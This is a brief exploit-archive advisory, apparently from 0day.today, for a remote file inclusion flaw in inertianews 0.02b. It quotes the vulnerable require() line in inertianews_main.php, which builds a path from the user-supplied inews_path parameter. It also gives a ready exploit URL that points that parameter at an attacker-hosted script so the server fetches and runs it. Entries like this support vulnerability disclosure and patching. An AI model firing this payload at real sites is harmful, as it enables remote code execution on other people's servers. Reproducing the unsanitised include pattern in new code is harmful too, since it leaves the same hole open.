id: 1286
date: 12/21/2006
title: inertianews 0.02b (inertianews_main.php) Remote Include Vulnerability
author: bd0rk
cves: 

=====================================================================
inertianews 0.02b (inertianews_main.php) Remote Include Vulnerability
=====================================================================




+++++++++++++++++++++++++++++++++++++++++++++++++++++++
+                                                     +
+ inertianews 0.02b Remote File Include Vulnerability +
+                                                     +
+ Found3R: bd0rk || SOH-Crew                          +
+                                                     +
+ eMail: bd0rk[at]hackermail.com                      +
+                                                     +
+ Greetz: TheJT, Axel H., Carsten S.                  +
+                                                     +
+++++++++++++++++++++++++++++++++++++++++++++++++++++++

=> Vulnerable Code in inertianews_main.php <=

Code: require ("$inews_path/inertia_sql_class.php");

[+]Exploit: http://[host]/[inertia_dir]/inertianews_main.php?inews_path=http://[TroubleScript]

Special-Greetz: ajann, Kacper, Google-Team :-)


#  0day.today [2023-03-25]  #